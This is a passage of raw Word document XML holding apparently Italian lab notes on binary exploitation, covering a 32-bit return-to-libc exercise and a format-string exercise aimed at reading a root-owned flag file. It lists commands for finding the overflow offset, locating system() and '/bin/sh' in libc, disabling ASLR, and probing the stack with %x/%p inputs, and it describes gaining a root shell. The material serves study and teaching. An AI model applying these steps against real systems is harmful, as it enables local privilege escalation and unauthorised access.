                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11"/>
                    <a:srcRect t="3624" r="62772"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3796197" cy="3038650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="779B6DA1" w14:textId="21A802BF" w:rsidR="00AF5671" w:rsidRPr="00C21978" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21978">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>06-return_to_libc 32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EE98B8" w14:textId="77777777" w:rsidR="00CC100E" w:rsidRPr="00C21978" w:rsidRDefault="00CC100E" w:rsidP="00CC100E"/>
    <w:p w14:paraId="752CE49E" w14:textId="75C4A824" w:rsidR="00CC100E" w:rsidRPr="00CC100E" w:rsidRDefault="00CC100E" w:rsidP="00CC100E">
      <w:r w:rsidRPr="00CC100E">
        <w:t>Essenzialmente sia il 5 che q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">uesto consistono nel dover leggere le flag che non potrebbero essere lette in quanto non abbiamo i permessi per farlo, ma i permessi ce li ha root, per riuscire a camuffarci da root dobbiamo mandare tutto in overflow e trovare i vari offset per le funzioni che vogliamo usare (system e libc che è la libreria che ci interessa). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1097E243" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRPr="00CC100E" w:rsidRDefault="00AF5671" w:rsidP="00AF5671"/>
    <w:p w14:paraId="595E409D" w14:textId="7066CC05" w:rsidR="00AF5671" w:rsidRPr="00C65D3F" w:rsidRDefault="00AF5671" w:rsidP="00C65D3F">
      <w:r w:rsidRPr="00C65D3F">
        <w:t>$ file securesever</w:t>
      </w:r>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C65D3F">
        <w:t xml:space="preserve">  -&gt; dynamically linked vuol dire che la</w:t>
      </w:r>
      <w:r w:rsidR="00C65D3F">
        <w:t xml:space="preserve"> funzione non è nel codice ma vengono chiamate dinamicamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4E67CB" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ checksec secureserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B72DB" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; NX enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D53CAB" w14:textId="43F962FA" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ls -lart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D125630" w14:textId="33813619" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chown root:root flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FAF671" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chown root:root secureserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C520D4C" w14:textId="77777777" w:rsidR="00AF5671" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chmod 600 flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730AE686" w14:textId="2D6D5EA1" w:rsidR="00AF5671" w:rsidRPr="00C21978" w:rsidRDefault="00AF5671" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C21978">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00C65D3F" w:rsidRPr="00C21978">
        <w:t>ghidra -&gt; analizziamo il codice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE36BE" w14:textId="13788341" w:rsidR="00C65D3F" w:rsidRPr="00C21978" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C21978">
        <w:lastRenderedPageBreak/>
        <w:t>$ gdb secureserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E03133" w14:textId="3FF9980E" w:rsidR="00C65D3F" w:rsidRPr="00C21978" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C21978">
        <w:t>$ cyclic 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21474091" w14:textId="7FBC58CE" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C65D3F">
        <w:t>$ run --&gt; e compiliamo con l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’output di cyclic 100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3694DB" w14:textId="6F909C5E" w:rsidR="00C65D3F" w:rsidRPr="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r>
        <w:t>$ cyclic -l taaa --&gt; quello che c’è nell’EIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ECB80C" w14:textId="27DC8688" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00C65D3F">
        <w:t>Found at offset 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B49B62" w14:textId="0E09F452" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r>
        <w:t>$ search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625E2ED" w14:textId="285EA607" w:rsidR="00C65D3F" w:rsidRDefault="00C65D3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00C65D3F">
        <w:t>$ search -t string “bin/sh” --&gt; cerca dentro la li</w:t>
      </w:r>
      <w:r>
        <w:t>breria c l’indirizzo di memoria della funzione di c che esegue la shell.</w:t>
      </w:r>
      <w:r w:rsidR="001D00EC">
        <w:t xml:space="preserve"> Essenzialmente tramite questa particolare funzione riusciamo a darci dei privilegi che magari l’untente non ci ha dato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CF42F6" w14:textId="658CD7C1" w:rsidR="001D00EC" w:rsidRDefault="001D00EC" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001D00EC">
        <w:t>libc.so.6       0xea8670d5 '/bin/sh'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0D4D7" w14:textId="77777777" w:rsidR="004F7F3F" w:rsidRDefault="001D00EC" w:rsidP="00AF5671">
      <w:r w:rsidRPr="001D00EC">
        <w:t>$ ldd secureserver --&gt; list dynamic dependencies, eseguendolo più volte vedi</w:t>
      </w:r>
      <w:r>
        <w:t>amo che l’indirizzo di libc cambia sempre perché l’ASLR è attivo e bisogna disabilitarlo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2714BD5E" w14:textId="77777777" w:rsidR="004F7F3F" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="004F7F3F">
        <w:t>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --&gt; disabilita la randomizzazione se la si vuole riattivare o si fa echo 1 (parziale) o echo 2 (totale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9476AF" w14:textId="29227159" w:rsidR="001D00EC" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="004F7F3F">
        <w:t>$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system --&gt; per trovare l’offset della funzione system dalla root di l</w:t>
      </w:r>
      <w:r>
        <w:t>ibc</w:t>
      </w:r>
      <w:r w:rsidR="00D9656F">
        <w:t>, quidi tecnicamente se scrivessimo grep puts troveremmo l’offset dalla base di libc a puts.</w:t>
      </w:r>
      <w:r w:rsidR="00C21978">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00C21978" w:rsidRPr="00C21978">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>SI USA PER LE FUNZIONI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB7DE5" w14:textId="27420764" w:rsidR="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00AF5671">
      <w:r>
        <w:t>La posizione della libreria ci serve per arrivare a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379B70C" w14:textId="7EE22017" w:rsidR="004F7F3F" w:rsidRDefault="004F7F3F" w:rsidP="00AF5671">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7F3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt; 2166: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9656F">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>00048170</w:t>
      </w:r>
      <w:r w:rsidRPr="004F7F3F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7D169" w14:textId="652B3A3B" w:rsidR="00D9656F" w:rsidRPr="00BD3AE2" w:rsidRDefault="00D9656F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>00048170</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t xml:space="preserve"> --&gt; offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756D78CC" w14:textId="14EBC13A" w:rsidR="00D9656F" w:rsidRDefault="00D9656F" w:rsidP="00AF5671">
      <w:r w:rsidRPr="00D9656F">
        <w:t>$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh" --&gt; in questo modo mi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> trovo solo l’offset da libc a /bin/sh, strings legge tutta la libreria, ‘grep’ preleva quella interessata, ‘-a’ scansiona la libreria e ‘-t x’ formatta in hex</w:t>
      </w:r>
      <w:r w:rsidR="00C21978">
        <w:t xml:space="preserve">.    </w:t>
      </w:r>
      <w:r w:rsidR="00C21978" w:rsidRPr="00C21978">
        <w:rPr>
          <w:b/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>SI USA PER I COMANDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F84B3" w14:textId="5A136B28" w:rsidR="00CC100E" w:rsidRDefault="00D9656F" w:rsidP="00AF5671">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9656F">
        <w:t>1bd0d5 /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78631373" w14:textId="1A4C5473" w:rsidR="00D9656F" w:rsidRDefault="00CC100E" w:rsidP="00AF5671">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Quindi aprendo il file exploit.py vediamo:</w:t>
      </w:r>
      <w:r w:rsidR="00BD3AE2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD3AE2">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472B60A4" wp14:editId="2FB77545">
            <wp:extent cx="4010025" cy="3692156"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="12963188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18845" name="Immagine 1" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4024006" cy="3705029"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FCCD2B" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>La funzione system() in Linux (e in generale nei sistemi Unix-like) è una funzione della libreria standard C che permette di </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>eseguire un comando esterno da un programma</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>. In pratica, la funzione system() prende una stringa che rappresenta un comando, lo passa alla shell del sistema (solitamente /bin/sh), e la shell lo esegue come se lo avessi digitato direttamente nel terminale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7257E307" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Come funziona system():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AD7FDA" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Riceve una stringa</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: La funzione system() accetta come unico argomento una stringa const char *command che rappresenta il comando da eseguire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0E8EDD" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Invoca la shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: Internamente, system() crea un nuovo processo tramite la chiamata di sistema fork() e poi usa una delle funzioni exec...() per lanciare un'istanza della shell, come /bin/sh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B5E65" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Esegue il comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: La shell esegue il comando specificato nella stringa command. Questo comando può essere qualsiasi comando valido per la shell, inclusi i comandi interni alla shell, comandi esterni, pipeline, redirection, ecc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B125AE" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Attende la fine del comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: system() si blocca e attende che il comando esterno termini la sua esecuzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF47A6" w14:textId="77777777" w:rsidR="00BD3AE2" w:rsidRPr="00BD3AE2" w:rsidRDefault="00BD3AE2" w:rsidP="00BD3AE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3AE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Restituisce il codice di uscita</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3AE2">
        <w:t>: Una volta che il comando esterno è terminato, system() restituisce il codice di uscita del comando. Questo codice di uscita indica se il comando è stato eseguito correttamente o se ci sono stati errori. Un codice di uscita 0 indica successo, mentre un valore diverso da 0 indica un errore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F7169" w14:textId="148E9008" w:rsidR="00C21978" w:rsidRDefault="00BD3AE2" w:rsidP="00AF5671">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Essenzialmente tramite il payload che abbiamo creato chiamiamo la shell /bin/bash nel file della root per il quale non abbiamo i permessi di esecuzione (NX enabled) e tramite la funzione system eseguiamo il codice come fossimo root (infatti chiedendo whoami, risponderà root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FF11E7" w14:textId="2AC4D815" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C21978">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>07-format_string_vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01411371" w14:textId="77777777" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126CE1CF" w14:textId="720A494B" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ file format_vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885B8AC" w14:textId="3C434299" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ checksec --file format_vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB9615E" w14:textId="52FEB85C" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ls -lart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D1F3BB" w14:textId="1EBF9A31" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat flag.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF8A16" w14:textId="234FB96C" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;&gt; permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9A27E" w14:textId="55441554" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chown root:root format_vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D255B" w14:textId="00B40AAB" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ sudo chmod 4655 format_vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A0084" w14:textId="28363F59" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ ls -lart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F73181" w14:textId="07780253" w:rsidR="00C21978" w:rsidRPr="00AB3559" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:r w:rsidRPr="00AB3559">
        <w:t>$ sudo chmod 600 flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A2415F" w14:textId="6359B3BA" w:rsidR="00C21978" w:rsidRDefault="00C21978" w:rsidP="00C21978">
      <w:r w:rsidRPr="00C21978">
        <w:t>$ ghidra --&gt; pe</w:t>
      </w:r>
      <w:r>
        <w:t>r analizzare un pò il codice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B052923" w14:textId="77777777" w:rsidR="00AE5D32" w:rsidRDefault="00B15362" w:rsidP="00C21978">
      <w:r w:rsidRPr="00B15362">
        <w:t>In questo cod</w:t>
      </w:r>
      <w:r>
        <w:t>ice non vengono fatti controlli su quello che arriva dai get quindi stamperà qualsiasi cosa noi gli inseriamo, di fatto possiamo provare a eseguire format_vuln e mettere imput come: %x %x %x %x oppure %p %p %p %p</w:t>
      </w:r>
      <w:r w:rsidR="00AE5D32">
        <w:t>, noteremo che se inseriamo %s il programma andrà in segmentation fault perché non ha stringhe da stampare</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAE5DD" w14:textId="7C75D7C0" w:rsidR="00B15362" w:rsidRDefault="00C55714" w:rsidP="00C21978">
      <w:r w:rsidRPr="00C55714">
        <w:t>In questo esempio nel f</w:t>
      </w:r>
      <w:r>
        <w:t>ile fuzz.py si può trovare uno script che stampa le prime 100 allocazioni dello stack riuscendo a leggere le flag le quali non eravamo autorizzati a leggere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C8D7E7" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR (Address Space Layout Randomization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440FA1D1" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cosa fa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> ASLR randomizza le posizioni in memoria (indirizzi) dove vengono caricate diverse componenti di un processo, come la stack, l'heap, le librerie condivise e il codice dell'eseguibile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BFB428" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Obiettivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> Rende difficile per un attaccante prevedere le posizioni in memoria di questi elementi. Questo ostacola gli attacchi che si basano su indirizzi specifici, come il buffer overflow o il Return-Oriented Programming (ROP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F2538" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Come funziona:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> Ad ogni esecuzione, il sistema operativo assegna casualmente nuovi indirizzi di memoria. Questo rende gli indirizzi variabili e non prevedibili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3A224" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ambito:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C55714">
        <w:t> È una funzionalità a livello di sistema operativo (kernel). Si applica a tutti i processi e a tutte le loro componenti (eseguibile, librerie, stack, heap, ecc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A04640" w14:textId="77777777" w:rsidR="00C55714" w:rsidRPr="00C55714" w:rsidRDefault="00C55714" w:rsidP="00C55714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55714">
        <w:rPr>
